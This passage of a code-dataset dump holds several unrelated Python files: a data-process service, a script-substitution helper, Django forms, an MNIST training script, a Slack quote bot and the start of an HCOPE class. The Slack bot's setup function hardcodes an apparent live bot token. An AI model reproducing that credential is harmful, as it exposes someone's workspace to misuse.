#------------------------------------------------------------------------------------------------------------------------------------------\n # get the streams associated with this IN data products\n #------------------------------------------------------------------------------------------------------------------------------------------\n for in_data_product_id in in_data_product_ids:\n\n # Get the stream associated with this input data product\n stream_ids, _ = self.clients.resource_registry.find_objects(in_data_product_id, PRED.hasStream, RT.Stream, True)\n\n validate_is_not_none( stream_ids, \"No Stream created for this input Data Product \" + str(in_data_product_id))\n validate_is_not_none( len(stream_ids) != 1, \"Input Data Product should only have ONE stream\" + str(in_data_product_id))\n\n # We take for now one stream_id associated with each input data product\n input_stream_ids.append(stream_ids[0])\n\n return input_stream_ids\n\n def _launch_process(self, queue_name='', out_streams=None, process_definition_id='', configuration=None):\n \"\"\"\n Launches the process\n \"\"\"\n\n # ------------------------------------------------------------------------------------\n # Spawn Configuration and Parameters\n # ------------------------------------------------------------------------------------\n\n configuration['process'] = {\n 'queue_name':queue_name,\n 'publish_streams' : out_streams\n }\n\n # ------------------------------------------------------------------------------------\n # Process Spawning\n # ------------------------------------------------------------------------------------\n # Spawn the process\n pid = self.clients.process_dispatcher.schedule_process(\n process_definition_id=process_definition_id,\n configuration=configuration\n )\n validate_is_not_none( pid, \"Process could not be spawned\")\n\n return pid\n\n\n def _find_lookup_tables(self, resource_id=\"\", configuration=None):\n #check if resource has lookup tables attached\n\n configuration = configuration or DotDict()\n\n attachment_objs, _ = self.clients.resource_registry.find_objects(resource_id, PRED.hasAttachment, RT.Attachment, False)\n\n for attachment_obj in attachment_objs:\n\n words = set(attachment_obj.keywords)\n\n if 'DataProcessInput' in words:\n configuration[attachment_obj.name] = attachment_obj.content\n log.debug(\"Lookup table, %s, found in attachment %s\" % (attachment_obj.content, attachment_obj.name))\n else:\n log.debug(\"NO lookup table in attachment %s\" % attachment_obj.name)\n\n return configuration\n\n def update_data_process_inputs(self, data_process_id=\"\", in_stream_ids=None):\n #@TODO: INPUT STREAM VALIDATION\n log.debug(\"Updating inputs to data process '%s'\", data_process_id)\n data_process_obj = self.clients.resource_registry.read(data_process_id)\n subscription_id = data_process_obj.input_subscription_id\n was_active = False \n if subscription_id:\n # get rid of all the current streams\n try:\n log.debug(\"Deactivating subscription '%s'\", subscription_id)\n self.clients.pubsub_management.deactivate_subscription(subscription_id)\n was_active = True\n\n except BadRequest:\n log.info('Subscription was not active')\n\n self.clients.pubsub_management.delete_subscription(subscription_id)\n\n new_subscription_id = self.clients.pubsub_management.create_subscription(data_process_obj.name,\n stream_ids=in_stream_ids)\n data_process_obj.input_subscription_id = new_subscription_id\n\n self.clients.resource_registry.update(data_process_obj)\n\n if was_active:\n log.debug(\"Activating 
subscription '%s'\", new_subscription_id)\n self.clients.pubsub_management.activate_subscription(new_subscription_id)\n\n \n\n def update_data_process(self,):\n #todo: What are valid ways to update a data process?.\n\n return\n\n def read_data_process(self, data_process_id=\"\"):\n\n data_proc_obj = self.clients.resource_registry.read(data_process_id)\n return data_proc_obj\n\n\n def delete_data_process(self, data_process_id=\"\"):\n\n # Delete the specified DataProcessDefinition object\n data_process_obj = self.read_data_process(data_process_id)\n\n log.debug(\"delete the association with DataProcessDefinition\")\n dpd_assn_ids = self.clients.resource_registry.find_associations(subject=data_process_id, predicate=PRED.hasProcessDefinition, id_only=True)\n for dpd_assn_id in dpd_assn_ids:\n self.clients.resource_registry.delete_association(dpd_assn_id)\n\n self._stop_process(data_process_obj)\n\n\n log.debug(\"Finalizing data products by removing streams associated with the dataset and product\")\n out_products, assocs = self.clients.resource_registry.find_objects(subject=data_process_id, predicate=PRED.hasOutputProduct, id_only=True)\n for out_product, assoc in zip(out_products, assocs):\n data_product_management = DataProductManagementServiceClient()\n data_product_management.remove_streams(out_product)\n log.debug(\"deleting association with output data product '%s'\" % out_product)\n self.clients.resource_registry.delete_association(assoc)\n\n self.clients.data_acquisition_management.unassign_data_product(data_process_id, out_product)\n\n\n log.debug(\"Delete the input product links\")\n inprod_associations = self.clients.resource_registry.find_associations(data_process_id, PRED.hasInputProduct)\n for inprod_association in inprod_associations:\n self.clients.resource_registry.delete_association(inprod_association)\n\n\n try:\n self.deactivate_data_process(data_process_id=data_process_id)\n log.warn('Deleteing activated data process...')\n except BadRequest:\n pass\n\n subscription_id = data_process_obj.input_subscription_id\n self.clients.pubsub_management.delete_subscription(subscription_id)\n data_process_obj.input_subscription_id = None\n\n #unregister the data process in DataAcquisitionMgmtSvc\n self.clients.data_acquisition_management.unregister_process(data_process_id)\n\n # Delete the data process\n self.clients.resource_registry.retire(data_process_id)\n return\n\n def force_delete_data_process(self, data_process_id=\"\"):\n\n # if not yet deleted, the first execute delete logic\n dp_obj = self.read_data_process(data_process_id)\n if dp_obj.lcstate != LCS.RETIRED:\n self.delete_data_process(data_process_id)\n\n self._remove_associations(data_process_id)\n self.clients.resource_registry.delete(data_process_id)\n\n def _stop_process(self, data_process):\n log.debug(\"stopping data process '%s'\" % data_process.process_id)\n pid = data_process.process_id\n self.clients.process_dispatcher.cancel_process(pid)\n\n\n def find_data_process(self, filters=None):\n \"\"\"\n @param filters: dict of parameters to filter down\n the list of possible data proc.\n @retval\n \"\"\"\n #todo: add filter processing\n data_process_list , _ = self.clients.resource_registry.find_resources(RT.DataProcess, None, None, True)\n return data_process_list\n\n def activate_data_process(self, data_process_id=\"\"):\n\n data_process_obj = self.read_data_process(data_process_id)\n log.debug(\"activate_data_process:data_process_obj %s \", str(data_process_obj))\n\n\n# #update the producer context with the 
activation time and the configuration\n\n\n # todo: update the setting of this context with the return vals from process_dispatcher:schedule_process after convert\n # todo: process_id, process_definition, schedule, configuration\n\n producer_obj = self._get_process_producer(data_process_id)\n producertype = type(producer_obj).__name__\n #todo: producer_obj.producer_context.type_ is returning the base type, not the derived type.\n if producer_obj.producer_context.type_ == OT.DataProcessProducerContext :\n log.debug(\"activate_data_process:activation_time %s \", str(IonTime().to_string()))\n producer_obj.producer_context.activation_time = IonTime().to_string()\n producer_obj.producer_context.configuration = data_process_obj.configuration\n self.clients.resource_registry.update(producer_obj)\n\n subscription_id = data_process_obj.input_subscription_id\n self.clients.pubsub_management.activate_subscription(subscription_id=subscription_id)\n\n def deactivate_data_process(self, data_process_id=\"\"):\n\n data_process_obj = self.read_data_process(data_process_id)\n\n if not data_process_obj.input_subscription_id:\n log.warn(\"data process '%s' has no subscription id to deactivate\", data_process_id)\n return\n\n subscription_obj = self.clients.pubsub_management.read_subscription(data_process_obj.input_subscription_id)\n\n if subscription_obj.activated:\n\n #update the producer context with the deactivation time\n # todo: update the setting of this contect with the return vals from process_dispatcher:schedule_process after convert\n producer_obj = self._get_process_producer(data_process_id)\n producertype = type(producer_obj).__name__\n if producer_obj.producer_context.type_ == OT.DataProcessProducerContext :\n log.debug(\"data_process '%s' (producer '%s'): deactivation_time = %s \",\n data_process_id, producer_obj._id, str(IonTime().to_string()))\n producer_obj.producer_context.deactivation_time = IonTime().to_string()\n self.clients.resource_registry.update(producer_obj)\n\n subscription_id = data_process_obj.input_subscription_id\n log.debug(\"Deactivating subscription '%s'\", subscription_id)\n self.clients.pubsub_management.deactivate_subscription(subscription_id=subscription_id)\n\n\n\n def attach_process(self, process=''):\n \"\"\"\n @param process: Should this be the data_process_id?\n @retval\n \"\"\"\n # TODO: Determine the proper input param\n pass\n\n def _get_process_producer(self, data_process_id=\"\"):\n producer_objs, _ = self.clients.resource_registry.find_objects(subject=data_process_id, predicate=PRED.hasDataProducer, object_type=RT.DataProducer, id_only=False)\n if not producer_objs:\n raise NotFound(\"No Producers created for this Data Process \" + str(data_process_id))\n return producer_objs[0]\n\n\n ############################\n #\n # EXTENDED RESOURCES\n #\n ############################\n\n\n\n def get_data_process_definition_extension(self, data_process_definition_id='', ext_associations=None, ext_exclude=None):\n #Returns an DataProcessDefinition Extension object containing additional related information\n\n if not data_process_definition_id:\n raise BadRequest(\"The data_process_definition_id parameter is empty\")\n\n extended_resource_handler = ExtendedResourceContainer(self)\n\n extended_data_process_definition = extended_resource_handler.create_extended_resource_container(\n extended_resource_type=OT.DataProcessDefinitionExtension,\n resource_id=data_process_definition_id,\n computed_resource_type=OT.DataProcessDefinitionComputedAttributes,\n 
ext_associations=ext_associations,\n ext_exclude=ext_exclude)\n\n #Loop through any attachments and remove the actual content since we don't need\n # to send it to the front end this way\n #TODO - see if there is a better way to do this in the extended resource frame work.\n if hasattr(extended_data_process_definition, 'attachments'):\n for att in extended_data_process_definition.attachments:\n if hasattr(att, 'content'):\n delattr(att, 'content')\n\n return extended_data_process_definition\n\n def get_data_process_extension(self, data_process_id='', ext_associations=None, ext_exclude=None):\n #Returns an DataProcessDefinition Extension object containing additional related information\n\n if not data_process_id:\n raise BadRequest(\"The data_process_definition_id parameter is empty\")\n\n extended_resource_handler = ExtendedResourceContainer(self)\n\n extended_data_process = extended_resource_handler.create_extended_resource_container(\n extended_resource_type=OT.DataProcessExtension,\n resource_id=data_process_id,\n computed_resource_type=OT.DataProcessComputedAttributes,\n ext_associations=ext_associations,\n ext_exclude=ext_exclude)\n\n #Loop through any attachments and remove the actual content since we don't need\n # to send it to the front end this way\n #TODO - see if there is a better way to do this in the extended resource frame work.\n if hasattr(extended_data_process, 'attachments'):\n for att in extended_data_process.attachments:\n if hasattr(att, 'content'):\n delattr(att, 'content')\n\n return extended_data_process\n\n\n def _remove_associations(self, resource_id=''):\n \"\"\"\n delete all associations to/from a resource\n \"\"\"\n\n # find all associations where this is the subject\n _, obj_assns = self.clients.resource_registry.find_objects(subject=resource_id, id_only=True)\n\n # find all associations where this is the object\n _, sbj_assns = self.clients.resource_registry.find_subjects(object=resource_id, id_only=True)\n\n log.debug(\"pluck will remove %s subject associations and %s object associations\",\n len(sbj_assns), len(obj_assns))\n\n for assn in obj_assns:\n log.debug(\"pluck deleting object association %s\", assn)\n self.clients.resource_registry.delete_association(assn)\n\n for assn in sbj_assns:\n log.debug(\"pluck deleting subject association %s\", assn)\n self.clients.resource_registry.delete_association(assn)\n\n # find all associations where this is the subject\n _, obj_assns = self.clients.resource_registry.find_objects(subject=resource_id, id_only=True)\n\n # find all associations where this is the object\n _, sbj_assns = self.clients.resource_registry.find_subjects(object=resource_id, id_only=True)\n\n log.debug(\"post-deletions, pluck found %s subject associations and %s object associations\",\n len(sbj_assns), len(obj_assns))\n","sub_path":"ion/services/sa/process/data_process_management_service.py","file_name":"data_process_management_service.py","file_ext":"py","file_size_in_byte":36908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493605072","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nSistemi Corporation, copyright, all rights reserved, 2023\nMartin Guthrie\n\nThis is a helper script to test scripts that contain substitutions.\nNormally CLI prism_dev.py will not run a script with substitutions.\nUse this script to process a script that has substitutions and save\na new script that has processed substitutions.\n\nNOTE: the substitutions must be \"set\" within this script below.\n See the # !! MODIFY !! section line ~150\n\n\"\"\"\nimport os\nimport re\nimport json\nimport jstyleson\nimport argparse\n\nimport logging\nlogger = logging.getLogger(\"subs\")\n\n\nSCRIPT_REPLACE_RE = r'\\\"%%.*?\\\"' # \"%%Text\"\n\n\ndef find_sub_items(script_text):\n \"\"\" find items in the script text that are marked for substitution from user input\n The format of fields to be found is \"%%Text\"\n :param script_text:\n :return: a dict of items to be replaced in script\n \"\"\"\n matches = re.finditer(SCRIPT_REPLACE_RE, script_text, re.MULTILINE)\n items = [item.group() for item in matches]\n return list(dict.fromkeys(items)) # removes duplicates\n\n\ndef find_sub_items_replace(script_text, replacements):\n \"\"\" Replace '%%Name' items in script from replacements\n\n - replacements that are of type \"num\", also need to remove surrounding quotes,\n a bit of a hack to do it here, but thats where we are...\n\n :param script_text:\n :param replacements: list of replacement dicts, [{'Lot': '12345'}, ...]\n :return:\n \"\"\"\n script = jstyleson.loads(script_text)\n script_subs = script.pop(\"subs\", {})\n logger.debug(script_subs)\n logger.info(replacements)\n\n def _sub_replace(k, v, t):\n # In order to do the subs correctly, we need to know if the sub is\n # a string or a num, to know whether the quotes (\"\") should be removed or not.\n if t == \"num\":\n return script_text.replace('\"%%{}\"'.format(k), str(v))\n else:\n return script_text.replace(\"%%{}\".format(k), str(v))\n\n for r in replacements:\n for k, v in r.items():\n\n if k not in script_subs:\n logger.error(f\"{k} not in script subs\")\n return None\n\n if not isinstance(v, str):\n logger.error(f\"sub {k} value {v} must be a string\")\n return None\n\n logger.info(f\"{k} -> {v}\")\n script_text = _sub_replace(k, v, script_subs[k][\"type\"])\n\n # inner substitutions\n if \"subs\" in script_subs[k]:\n if v in script_subs[k][\"subs\"]:\n for inner_k in script_subs[k]['subs'][v].keys():\n _type = script_subs[k]['subs'][v][inner_k][\"type\"]\n _val = script_subs[k]['subs'][v][inner_k][\"val\"]\n logger.info(f\"{k} -> {v} {inner_k} --> {_val}\")\n script_text = _sub_replace(inner_k, _val, _type)\n\n return script_text\n\n\ndef parse_args():\n \"\"\"\n :return: args\n \"\"\"\n epilog = \"\"\"\nUsage examples:\n python3 prism_subs.py -w --script public/prism/scripts/example/prod_v0/prod_1.scr \n\n \"\"\"\n parser = argparse.ArgumentParser(description='prism_result_scan',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=epilog)\n\n parser.add_argument(\"-s\", \"--script\",\n dest=\"script\",\n action=\"store\",\n required=True,\n help=\"Path to script file to sub\")\n\n parser.add_argument(\"-w\", \"--write\",\n dest=\"write\",\n action=\"store_true\",\n help=\"Write output to file\")\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n logger.setLevel(logging.INFO)\n\n logger.info(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n logger.info(\"SUBS WITHIN SCRIPT MUST BE MODIFIED TO SUIT THE 
TARGET SCRIPT\")\n logger.info(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n args = parse_args()\n file = args.script\n\n if not os.path.isfile(file):\n logger.error(f\"Unable to find json file {file}\")\n exit(1)\n\n with open(file) as f:\n json_data = f.read()\n\n try:\n # check script formatting by importing it\n script = jstyleson.loads(json_data) # OK\n\n except Exception as e:\n logger.error(e)\n exit(1)\n\n script_text = json.dumps(script, indent=2)\n\n # !! MODIFY !!\n # subs to test, normally this list comes from the GUI or the traveller\n # all the values must be strings\n s = [{\"Lot\": \"12345\"},\n {\"Loc\": \"canada/ontario/milton\"},\n #{\"Loc\": \"us/newyork/buffalo\"},\n {\"TST000Max\": \"9\"}\n ]\n final_script_text = find_sub_items_replace(script_text, s)\n # rename subs key so that prism_dev.py will not error\n final_script_text = final_script_text.replace(\"subs\", \"subs1\", 1)\n logger.info(final_script_text)\n\n if args.write: # save output to file for use with prism_dev.py\n file_out = file.replace(\".scr\", \"_sub.scr\")\n with open(file_out, 'w') as f:\n f.write(final_script_text)\n","sub_path":"prism_subs.py","file_name":"prism_subs.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"33106537","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.utils.translation import gettext_lazy, gettext\n\nfrom . import models\n\nchosen_js = {\"class\": \"chosen-select-contains\"}\n\n\nclass SectionForm(forms.ModelForm):\n class Meta:\n model = models.Section\n exclude = [\n 'shortish_name',\n 'full_name',\n 'full_name_ver1',\n ]\n widgets = {\n 'last_modified_by': forms.HiddenInput(),\n 'head': forms.Select(attrs=chosen_js),\n 'admin': forms.Select(attrs=chosen_js),\n\n }\n\n def __init__(self, *args, **kwargs):\n USER_CHOICES = [(u.id, \"{}, {}\".format(u.last_name, u.first_name)) for u in\n User.objects.all().order_by(\"last_name\", \"first_name\")]\n USER_CHOICES.insert(0, tuple((None, \"---\")))\n\n DIVISION_CHOICES = [(obj.id, \"{} - {}\".format(obj.branch, obj.name)) for obj in\n models.Division.objects.all().order_by(\"branch__region\", \"branch\", \"name\")]\n DIVISION_CHOICES.insert(0, tuple((None, \"---\")))\n\n super().__init__(*args, **kwargs)\n self.fields['head'].choices = USER_CHOICES\n self.fields['division'].choices = DIVISION_CHOICES\n\n\nclass DivisionForm(forms.ModelForm):\n class Meta:\n model = models.Division\n exclude = [\n 'date_last_modified',\n ]\n widgets = {\n 'last_modified_by': forms.HiddenInput(),\n 'head': forms.Select(attrs=chosen_js),\n 'admin': forms.Select(attrs=chosen_js),\n }\n\n def __init__(self, *args, **kwargs):\n BRANCH_CHOICES = [(obj.id, \"{} - {}\".format(obj.region, obj.name)) for obj in\n models.Branch.objects.all().order_by(\"region\", \"name\")]\n BRANCH_CHOICES.insert(0, tuple((None, \"---\")))\n\n super().__init__(*args, **kwargs)\n self.fields['branch'].choices = BRANCH_CHOICES\n\n\nclass BranchForm(forms.ModelForm):\n class Meta:\n model = models.Branch\n exclude = [\n 'date_last_modified',\n ]\n widgets = {\n 'last_modified_by': forms.HiddenInput(),\n 'head': forms.Select(attrs=chosen_js),\n 'admin': forms.Select(attrs=chosen_js),\n }\n\n\nclass RegionForm(forms.ModelForm):\n class Meta:\n model = models.Region\n exclude = [\n 'date_last_modified',\n ]\n widgets = {\n 'last_modified_by': forms.HiddenInput(),\n 'head': forms.Select(attrs=chosen_js),\n 'admin': 
forms.Select(attrs=chosen_js),\n }\n\n\nclass OrganizationForm(forms.ModelForm):\n class Meta:\n model = models.Organization\n fields = \"__all__\"\n\n\nclass UserCreateForm(forms.Form):\n first_name = forms.CharField(label=gettext_lazy(\"First name\"))\n last_name = forms.CharField(label=gettext_lazy(\"Last name\"))\n email1 = forms.EmailField(label=gettext_lazy(\"Email\"))\n email2 = forms.EmailField(label=gettext_lazy(\"Confirm email address\"))\n\n def clean_email1(self):\n new_email = self.cleaned_data['email1']\n # check to make sure is not a duplicate\n if User.objects.filter(email__iexact=new_email).count() > 0:\n raise forms.ValidationError(gettext(\"This email address already exists in the database.\"))\n # check to make sure is a DFO email\n if new_email.lower().endswith(\"@dfo-mpo.gc.ca\") == False:\n raise forms.ValidationError(gettext(\"The email address provided must be a DFO email address.\"))\n\n # Always return a value to use as the new cleaned data, even if\n # this method didn't change it.\n return new_email\n\n def clean(self):\n cleaned_data = super().clean()\n first_email = cleaned_data.get(\"email1\")\n second_email = cleaned_data.get(\"email2\")\n\n if first_email and second_email:\n # Only do something if both fields are valid so far.\n\n # verify the two emails are the same\n if first_email.lower() != second_email.lower():\n raise forms.ValidationError(gettext(\"Please make sure the two email addresses provided match.\"))\n\n\nclass ScriptForm(forms.ModelForm):\n class Meta:\n model = models.Script\n fields = \"__all__\"\n widgets = {\n 'modified_by': forms.HiddenInput(),\n }\n\n\n\nclass ResponsibilityCenterForm(forms.ModelForm):\n class Meta:\n model = models.ResponsibilityCenter\n fields = \"__all__\"\n\n\nclass ProjectCodeForm(forms.ModelForm):\n class Meta:\n model = models.Project\n fields = \"__all__\"\n","sub_path":"shared_models/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"200585937","text":"from helpers import *\nimport argparse\nimport os\nimport pickle\n\nparser = argparse.ArgumentParser(description='Image Detection')\nparser.add_argument('-use_trained_model', action = 'store_true')\n\n# Create and print the training dataset\ntrain_dataset = dsets.MNIST(root='../../utils/data', train=True, download=True, transform=transforms.ToTensor())\n# print(\"Downloaded the training dataset:\\n \", train_dataset)\n# Create and print the validating dataset\nvalidation_dataset = dsets.MNIST(root='../../utils/data', train=False, download=True, transform=transforms.ToTensor())\n# print(\"Downloaded the validating dataset:\\n \", validation_dataset)\n\nargs = parser.parse_args()\n\nif(not args.use_trained_model):\n\n\tinput_dimensions = 28*28\n\toutput_dimensions = 10\n\n\t# Create a model\n\tmodel = SoftMax(input_dimensions, output_dimensions)\n\n\t# define an optimizer\n\toptimizer = torch.optim.SGD(model.parameters(), lr = 0.1)\n\t# Define a loss function\n\tcriterion = nn.CrossEntropyLoss()\n\t# Define dataloaders\n\ttrainloader = DataLoader(dataset = train_dataset, batch_size = 100)\n\tvalidationloader = DataLoader(dataset = validation_dataset, batch_size = 5000)\n\n\tPlotParameters(model)\n\tplt.title('Before Training')\n\n\n\tn_epochs = 100\n\tfor epoch in range(n_epochs):\n\t\tprint('Running on epoch {}'.format(epoch), flush = True)\n\t\tfor x, y in trainloader:\n\t\t\toptimizer.zero_grad()\n\t\t\tz = model(x.view(-1, 28 * 
28))\n\t\t\tloss = criterion(z, y)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\twith open('model/trained_model.pkl', 'wb') as handle:\n\t\tpickle.dump(model, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nelse:\n\tif(not os.path.isfile('model/trained_model.pkl')):\n\t\tprint('Train the model first')\n\t\tos._exit(1)\n\n\twith open('model/trained_model.pkl', 'rb') as f:\n\t\tmodel = pickle.load(f)\t\n\nPlotParameters(model)\nplt.title('After Training')\n\n# Count the classified and miss classified data using the validation set\ncorrect = 0\nincorrect = 0\nfor (x,y) in validation_dataset:\n\tz = model(x.reshape(-1, 28*28))\n\t_, yhat = torch.max(z, 1)\n\tif(yhat == y):\n\t\tcorrect += 1\n\telse:\n\t\tincorrect += 1\n\nprint(\"Analysis:\")\nprint(\"Correctly classified data count =\", correct)\nprint(\"Incorrectly classified data count =\", incorrect)\nprint(\"Accuracy =\", correct/(correct+incorrect))\n\nplt.show()","sub_path":"models/Softmax/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"349115390","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Licensed under the terms of the MIT License\n\n\"\"\"\nSetup:\n# pip install slackclient\nCopy your slack bot token into bot_token.txt\nCreate quotes.csv file.\n\nStarting:\n# python qotd.py\n\nAdd bot to a channel by inviting it once you authorize the bot for your slack group.\n\"\"\"\n\nimport datetime\nimport json\nimport logging\nimport random\nimport time\n\nfrom slackclient import SlackClient\n\nlogging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)\n\n\ndef MPsetup():\n BOT_NAME = 'mpqotd'\n botuid = '<@U0LJ6Q4S0>: ' # @mpqotd\n token = 'xoxb-49868132742-2Pgt5bXPkSm1GCxhc3ZJg3nj' ### bot token for @mpqotd\n return BOT_NAME, botuid, token\n\n\ndef MBsetup():\n botuid = '<@U1F54AWA3>: ' # @qotd:\n with file('settings.json', 'r') as settingsfile:\n s = json.load(settingsfile)\n BOT_NAME = '<@' + s['bot']['id'] + '>: '\n\n with file('bot_token.txt', 'r') as tokenfile:\n token = tokenfile.read()\n return BOT_NAME, botuid, token\n\n\nwith file('quotes.json', 'r') as quotesfile:\n quotes = [json.loads(line) for line in quotesfile]\n\n### with quotes being JSON, why dont we integrate the attribution of the quote into it?\nwith file('attributions.csv', 'r') as attributionsfile:\n attributions = [line.strip() for line in attributionsfile]\n\ncredsetup = MPsetup\n\n(BOT_NAME, botuid, token) = credsetup()\n\n\n### Slack formatting\n### *bold* `code` _italic_ ~strike~\n\ndef get_bot_idA():\n global BOT_NAME\n api_call = sc.api_call(\"users.list\")\n if api_call.get('ok'):\n # retrieve all users so we can find our bot\n users = api_call.get('members')\n for user in users:\n if 'name' in user and user.get('name') == BOT_NAME:\n ### This is the only diff between our get_bot_io functions, what does it do?\n BOT_NAME = user.get('id')\n return { user['name']:user.get('id') }\n else:\n return \"could not find bot user with the name \" + BOT_NAME\n\n\ndef get_bot_idB():\n api_call = sc.api_call(\"users.list\")\n if api_call.get('ok'):\n # retrieve all users so we can find our bot\n users = api_call.get('members')\n for user in users:\n ### This will return on the first found user, what if there's multiple?\n if 'name' in user and user.get('name') == BOT_NAME:\n return { user['name']:user.get('id') }\n else:\n return \"could not find bot user with the name \" + BOT_NAME\n\n\n### Just to try out 
different implementations\nget_bot_id = get_bot_idB\n\n\ndef addQuote(msg):\n q = dict()\n q[\"quote\"] = msg['text'].strip('\"“')\n q[\"user\"] = msg['user']\n q[\"time\"] = str(datetime.datetime.utcnow())\n logging.info('Quote is: ' + q[\"quote\"])\n with file('quotes.csv', 'a') as quotesfile:\n logging.debug(\" TRYING TO ADD CONTENT\\n\" + json.dumps(q))\n quotesfile.write(\"\\n\" + json.dumps(q))\n quotes.append(q)\n output = sc.api_call('chat.postMessage', as_user='true', channel=chan,\n text='\\t_*\"' + q[\"quote\"] + '\"*_\\n\\tQuote added. High Five <@' + msg['user'] + '>!')\n logging.debug(output)\n\n\ndef autoping(last, msg):\n ### hardcode the interval to 3 seconds\n now = int(time.time())\n if last + 3 < now:\n sc.server.ping()\n return now\n\n\ndef printQuote(msg):\n output = sc.api_call('chat.postMessage', as_user='true', channel=msg['channel'],\n text='\\t' + random.choice(attributions) + ':\\n\\t\\t_*\"' + random.choice(quotes)[\n \"quote\"] + '\"*_')\n logging.debug(output)\n\n\ndef listQuotes(msg):\n mylist = '\\n'.join('\\t_*' + q[\"quote\"] + '*_' for q in quotes if q is not None)\n output = sc.api_call('chat.postMessage', as_user='true', channel=msg['channel'],\n text='\\t' + mylist + '\\n\\n\\t' + str(len(quotes)) + ' total quotes.')\n logging.debug(output)\n\n\ndef ping(msg):\n logging.debug('calling ping()')\n output = sc.api_call('chat.postMessage', as_user='true', channel=msg['channel'], text=\"PONG!!!\\n\")\n logging.debug(output)\n\n\ndef help(msg):\n output = sc.api_call('chat.postMessage', as_user='true', channel=msg['channel'],\n text=helptext + '\\n\\t' + str(len(quotes)) + ' total quotes.')\n logging.debug(output)\n\n\ncommands = {\n #{'command':s[\"bot\"][\"id\"]+'are you alive', 'response':'_*Yes, I\\'m ALLLIIIVE*_'},\n ### This descriptive format is not consistant, why do outputs are in [] and params in <>?\n 'lol' :{ 'action':printQuote, 'help':'lol [prints random quote]' },\n 'quote':{ 'action':printQuote, 'help':'quote [prints random quote]' },\n 'add' :{ 'action':addQuote, 'help':'add ' },\n 'list' :{ 'action':listQuotes, 'help':'list [prints out all quotes]' },\n 'help' :{ 'action':help, 'help':'help [prints this help text]' },\n 'ping' :{ 'action':ping, 'help':\"ping [pings back, letting you know it's alive]\" },\n}\n\nhelptext = 'Greetings traveler! 
Commands are:\\n'\nfor c in commands:\n helptext += \"\\t\" + BOT_NAME + commands[c]['help'] + \"\\n\"\ncommands['help']['response'] = helptext\n\n\"\"\"{ u'channel': u'G1FS1CJ84',\nu'team': u'T05311JTT',\nu'text': u'<@U1FRJ3WMU>: lol',\nu'ts': u'1465583194.000034',\nu'type': u'message',\nu'user': u'U0LJ6Q4S0'}\"\"\" ### Typical structure of a command packet\n\n\ndef sendReply(msg):\n msgcontent = msg['text']\n\n ### Disabled the general LOL detector for the time being\n # if 'lol' in text:\n # commands['quote']['action'](chan, msg)\n # return\n\n logging.debug(\"msgcontent ::: %s\" % msgcontent)\n ### Splits the username from commands+params\n fromuser, _, cmdparams = msgcontent.partition(' ')\n ### Splits the cmdparams into cmd and params\n cmd, _, params = cmdparams.partition(' ')\n logging.info('cmd =\"' + cmd + '\"')\n if cmd in commands:\n commands[cmd]['action'](msg)\n\n\n### Different structure for main loop:\n# new_evts = sc.rtm_read()\n# for evt in new_evts:\n# print(evt)\n# if \"type\" in evt:\n# if evt[\"type\"] == \"message\" and \"text\" in evt:\n# message = evt[\"text\"]\n\n\nsc = SlackClient(token)\nlogging.info(\"Connecting as \" + BOT_NAME)\n### Should the sc.rtm_connect be inside of try/except?\nif sc.rtm_connect():\n logging.info(\"...Connected!\")\n logging.debug(\"Bot username:userid %s\", get_bot_id())\n # logging.debug(\"BOT_NAME: %s\", BOT_NAME)\n last_ping = int(time.time())\n while True:\n messages = sc.rtm_read()\n # logging.debug(messages)\n #last_ping = autoping(last_ping)\n for message in messages:\n # logging.debug(message)\n ### simplify all these conditions into a single call function for readability\n if 'type' in message:\n if message['type'] not in ['presence_change', 'user_typing', 'reconnect_url'] \\\n and 'text' in message \\\n and not message['text'].startswith(botuid) \\\n and 'bot_id' not in message:\n logging.debug(message)\n sendReply(message)\n time.sleep(1)\nelse:\n logging.info(\"Connection Failed, invalid token?\")\n\n","sub_path":"qotd.py","file_name":"qotd.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521915851","text":"import numpy as np\nimport gym\nfrom policies import *\nimport math\nfrom scipy.optimize import minimize\nfrom scipy.special import j1\nfrom scipy.optimize import minimize_scalar\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\n\nclass HCOPE(object):\n\n def __init__(self,env,policy,eval_policy,rollout_length,delta=0.1):\n self.env = env\n self.policy= policy\n self.eval_policy=eval_policy\n self.rollout_length = rollout_length\n self.w_policy = self.policy.get_weights()\n # Set up maximum and minimum reward in a trajectory\n self.R_max = 200\n self.R_min = 1\n self.delta=delta\n if eval_policy is None:\n self.e_policy = None\n else:\n self.e_policy=self.eval_policy.get_weights()\n\n\n # Method to generate evaluation policy with gaussian noise added to our behaviour policy\n def setup_e_policy(self):\n noise = np.random.normal(0,0.01,self.w_policy.shape)\n self.e_policy = self.w_policy - noise\n self.eval_policy.update_weights(self.e_policy)\n\n def rollout(self,shift = 0.,policy = None, rollout_length = None,render = False):\n \"\"\" \n Performs one rollout of maximum length rollout_length. 
